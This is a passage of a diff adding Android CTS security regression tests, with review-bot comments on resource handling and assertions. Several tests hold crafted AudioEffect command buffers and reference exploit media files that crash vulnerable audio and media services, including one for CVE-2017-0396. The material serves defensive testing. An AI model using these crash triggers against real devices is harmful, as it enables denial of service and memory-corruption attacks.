+ new byte[parameterSize + SIZEOF_EFFECT_PARAM_T] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) set parameter with invalid psize
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(0xdddddddd) // psize (very large)
+ .putInt(4) // vsize
+ .putInt(1) // data[0] (param too small for psize)
+ .putInt(0) // data[4]
+ .array();
+ byte reply[] = new byte[4]; // returns status code (ignored)
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_SET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ // on failure reply may contain the status code.
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetOffload(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled with zero command and reply size
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_OFFLOAD,
+ new byte[0] /* command */,
+ new byte[0] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ // should match effect_visualizer.h (native)
+ private static final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ private static final int VISUALIZER_CMD_CAPTURE = 0x10000;
+ private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
+
+ // b/31781965
+ public void testVisualizerCapture_CVE_2017_0396() throws Exception {
+ // Capture params
+ final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
+ final byte[] captureBuf = new byte[CAPTURE_SIZE];
+
+ // Track params
+ final int sampleRate = 48000;
+ final int format = AudioFormat.ENCODING_PCM_16BIT;
+ final int loops = 1;
+ final int seconds = 1;
+ final int channelCount = 2;
+ final int bufferFrames = seconds * sampleRate;
+ final int bufferSamples = bufferFrames * channelCount;
+ final int bufferSize = bufferSamples * 2; // bytes per sample for 16 bits
+ final short data[] = new short[bufferSamples]; // zero data
+
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) != 0) {
+ continue;
+ }
+
+ AudioEffect audioEffect = null;
+ AudioTrack audioTrack = null;
+
+ try {
+ // create track and play
+ {
+ audioTrack = new AudioTrack(AudioManager.STREAM_MUSIC, sampleRate,
+ AudioFormat.CHANNEL_OUT_STEREO, format, bufferSize,
+ AudioTrack.MODE_STATIC);
+ assertEquals("Cannot write to audio track",
+ bufferSamples,
+ audioTrack.write(data, 0 /* offsetInBytes */, data.length));
+ assertEquals("AudioTrack not initialized",
+ AudioTrack.STATE_INITIALIZED,
+ audioTrack.getState());
+ assertEquals("Cannot set loop points",
+ android.media.AudioTrack.SUCCESS,
+ audioTrack.setLoopPoints(0 /* startInFrames */, bufferFrames, loops));
+ audioTrack.play();
+ }
+
+ // wait for track to really begin playing
+ Thread.sleep(200 /* millis */);
+
+ // create effect
+ {
+ audioEffect = (AudioEffect) AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type, descriptor.uuid, 0 /* priority */,
+ audioTrack.getAudioSessionId());
+ }
+
+ // set capture size
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(4) // psize (sizeof(param))
+ .putInt(4) // vsize (sizeof(value))
+ .putInt(VISUALIZER_PARAM_CAPTURE_SIZE) // data[0] (param)
+ .putInt(CAPTURE_SIZE) // data[4] (value)
+ .array();
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_SET_PARAM,
+ command, new byte[4] /* reply */);
+ Log.d(TAG, "setparam returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+
+ // enable effect
+ {
+ final int ret = audioEffect.setEnabled(true);
+ assertEquals("Cannot enable audio effect", 0 /* expected */, ret);
+ }
+
+ // wait for track audio data to be processed, otherwise capture
+ // will not really return audio data.
+ Thread.sleep(200 /* millis */);
+
+ // capture data
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ VISUALIZER_CMD_CAPTURE,
+ new byte[0] /* command */, captureBuf /* reply */);
+ Log.d(TAG, "capture returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } finally {
+ if (audioEffect != null) {
+ audioEffect.release();
+ }
+ if (audioTrack != null) {
+ audioTrack.release();
+ }
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
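Review bot: `test_android_bug_33251605` has no `@SecurityTest` annotation, while ZeroHeightTiffTest, added in this same change for the same kind of decoder regression, annotates its test; Movie33897722 has the same gap. If the annotation is what selects security tests for a run, add `@SecurityTest` above the method together with `import android.platform.test.annotations.SecurityTest;`. The method also has no assertion and never closes `exploitImage`, so I would add a comment such as `// Passes if decodeStream returns without running out of memory; the decoded bitmap is not inspected.` and close the stream in a `finally`.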
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
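Review bot: The `assertEquals` calls pass the actual value first (`assertEquals(movie.width(), 600)`), so a failure would report the measured value as the expected one. JUnit's order is expected then actual: `assertEquals(600, movie.width());`, `assertEquals(752, movie.height());` and `assertEquals(Color.TRANSPARENT, bitmap.getPixel(x, y));`. Adding the coordinates to the pixel assertion message would make it easier to see where a colour read from beyond the colour map ended up.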
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 22ff539..c481549 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2015 The Android Open Source Project
+ * Copyright (C) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -33,17 +33,22 @@
import android.media.MediaCodecList;
import android.media.MediaExtractor;
import android.media.MediaFormat;
+import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
import android.opengl.GLES20;
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
+import android.webkit.cts.CtsTestServer;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
+import java.util.HashMap;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -62,137 +67,234 @@
public StagefrightTest() {
}
+ /***********************************************************
+ to prevent merge conflicts, add K tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ public void testStagefright_bug_35763994() throws Exception {
+ doStagefrightTest(R.raw.bug_35763994);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_33137046() throws Exception {
+ doStagefrightTest(R.raw.bug_33137046);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
+ @SecurityTest
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- public void testStagefright_bug_32873375() throws Exception {
- doStagefrightTest(R.raw.bug_32873375);
- }
-
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- public void testStagefright_bug_14388161() throws Exception {
+ @SecurityTest
+ public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_3755() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3755);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
+ doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
+ }
+
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
- public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
- doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ /***********************************************************
+ to prevent merge conflicts, add N tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_35467107() throws Exception {
+ doStagefrightTest(R.raw.bug_35467107);
}
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
+ doStagefrightTestMediaMetadataRetriever(rid);
+
+ Context context = getInstrumentation().getContext();
+ Resources resources = context.getResources();
+ CtsTestServer server = new CtsTestServer(context);
+ String rname = resources.getResourceEntryName(rid);
+ String url = server.getAssetUrl("raw/" + rname);
+ doStagefrightTestMediaPlayer(url);
+ doStagefrightTestMediaCodec(url);
+ doStagefrightTestMediaMetadataRetriever(url);
+ server.shutdown();
}
private Surface getDummySurface() {
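Review bot: `server.shutdown()` at the end of `doStagefrightTest` is skipped whenever one of the three URL-based checks throws, which includes the `assertFalse("Device *IS* vulnerable to ...")` path taken on a device that fails the test. The CtsTestServer then stays up for the following test methods, which may make later failures in the class hard to attribute. Wrapping the URL block as `try { ... } finally { server.shutdown(); }` keeps each test self-contained. Separately, `testStagefright_bug_35763994` is the only test in this hunk without `@SecurityTest`.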
@@ -292,13 +394,32 @@
}
private void doStagefrightTestMediaPlayer(final int rid) throws Exception {
+ doStagefrightTestMediaPlayer(rid, null);
+ }
- String name = getInstrumentation().getContext().getResources().getResourceEntryName(rid);
+ private void doStagefrightTestMediaPlayer(final String url) throws Exception {
+ doStagefrightTestMediaPlayer(-1, url);
+ }
+
+ private void closeQuietly(AutoCloseable closeable) {
+ if (closeable != null) {
+ try {
+ closeable.close();
+ } catch (RuntimeException rethrown) {
+ throw rethrown;
+ } catch (Exception ignored) {
+ }
+ }
+ }
+
+ private void doStagefrightTestMediaPlayer(final int rid, final String uri) throws Exception {
+
+ String name = uri != null ? uri :
+ getInstrumentation().getContext().getResources().getResourceEntryName(rid);
Log.i(TAG, "start mediaplayer test for: " + name);
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
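Review bot: `closeQuietly` is not fully quiet: it rethrows any `RuntimeException` from `close()` and swallows only checked exceptions, which the name does not suggest. Since it is called from `finally` blocks, a rethrown exception would replace whatever the `try` body raised. A short comment on the method would make that deliberate, for example `// Swallows checked exceptions from close(); RuntimeExceptions still propagate.` The body of `doStagefrightTestMediaPlayer(int, String)` continues past this hunk.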
@@ -309,16 +430,23 @@
mp.setOnCompletionListener(mpcl);
Surface surface = getDummySurface();
mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
try {
- AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
- .openRawResourceFd(rid);
+ if (uri == null) {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(rid);
- mp.setDataSource(fd.getFileDescriptor(),
- fd.getStartOffset(),
- fd.getLength());
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ } else {
+ mp.setDataSource(uri);
+ }
mp.prepareAsync();
} catch (Exception e) {
+ } finally {
+ closeQuietly(fd);
}
Looper.loop();
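Review bot: The empty `catch (Exception e) { }` now also covers the new `mp.setDataSource(uri)` branch, so a URL that the test server cannot serve is dropped without a trace and the run may look like a pass even though no media was handed to the player. Logging keeps the lenient behaviour but leaves evidence: `Log.w(TAG, "setDataSource/prepareAsync failed", e);`. The enclosing `run()` starts and ends outside this hunk, so how the listener reacts afterwards is not visible here.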
@@ -335,6 +463,14 @@
}
private void doStagefrightTestMediaCodec(final int rid) throws Exception {
+ doStagefrightTestMediaCodec(rid, null);
+ }
+
+ private void doStagefrightTestMediaCodec(final String url) throws Exception {
+ doStagefrightTestMediaCodec(-1, url);
+ }
+
+ private void doStagefrightTestMediaCodec(final int rid, final String url) throws Exception {
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
@@ -353,6 +489,7 @@
mp.setDataSource(fd.getFileDescriptor(),
fd.getStartOffset(),
fd.getLength());
+ fd.close();
} catch (Exception e) {
// this is a known-good file, so no failure should occur
fail("setDataSource of known-good file failed");
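Review bot: `fd.close()` sits inside the `try`, so the descriptor stays open when `setDataSource` throws, whereas the other descriptors touched by this change are closed with `closeQuietly(fd)` in a `finally`. The same line is added in `doStagefrightTestMediaMetadataRetriever` later in this file, where `fd` is declared before the `try` and a `finally { closeQuietly(fd); }` would fit directly. The declaration of `fd` for this hunk lies outside it, so the same move here depends on its scope.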
@@ -372,16 +509,21 @@
}
Resources resources = getInstrumentation().getContext().getResources();
- AssetFileDescriptor fd = resources.openRawResourceFd(rid);
MediaExtractor ex = new MediaExtractor();
- try {
- ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
- } catch (IOException e) {
- // ignore
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ ex.setDataSource(url);
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
- String rname = resources.getResourceEntryName(rid);
+ String rname = url != null ? url: resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
for (int t = 0; t < numtracks; t++) {
// find all the available decoders for this format
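Review bot: The two data-source branches handle failure differently: the resource branch ignores `IOException` from `ex.setDataSource(...)`, but the new `ex.setDataSource(url)` call is outside any `try`, so an I/O error on the HTTP path propagates out of the test method as an error instead of being tolerated. If the intent is that a file the extractor rejects is not a failure, wrap the URL call the same way, e.g. `try { ex.setDataSource(url); } catch (IOException e) { /* ignore */ }`. The method begins before this hunk and continues after it.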
@@ -394,13 +536,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
@@ -421,16 +565,22 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
+ ex.getCachedDuration();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -451,14 +601,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
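Review bot: Replacing the two specific handlers with `catch (Exception e)` and a comment-only body removes the only place where a `MediaCodec.CodecException` with `ERROR_RECLAIMED` was escalated, which the removed comment described as a sign that the remote service had died. Detection of a crash now appears to rest on `mpcl.waitForError()` alone, and nothing records what the codec threw. Keeping the catch broad but logging it, `Log.i(TAG, "codec exception ignored", e);`, would preserve that evidence in the test log. The loop and the enclosing method start outside this hunk.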
@@ -469,6 +613,81 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
+ }
+ private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(rid, null);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(final String url) throws Exception {
+ doStagefrightTestMediaMetadataRetriever(-1, url);
+ }
+
+ private void doStagefrightTestMediaMetadataRetriever(
+ final int rid, final String url) throws Exception {
+
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ AssetFileDescriptor fd = null;
+ try {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+
+ // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
+ // setDataSource has been called
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ // this is a known-good file, so no failure should occur
+ fail("setDataSource of known-good file failed");
+ }
+
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ // wait until the thread has initialized the MediaPlayer
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaMetadataRetriever retriever = new MediaMetadataRetriever();
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ retriever.setDataSource(url, new HashMap<String, String>());
+ }
+ retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
+ retriever.getEmbeddedPicture();
+ retriever.getFrameAtTime();
+
+ retriever.release();
+ String rname = url != null ? url : resources.getResourceEntryName(rid);
+ String cve = rname.replace("_", "-").toUpperCase();
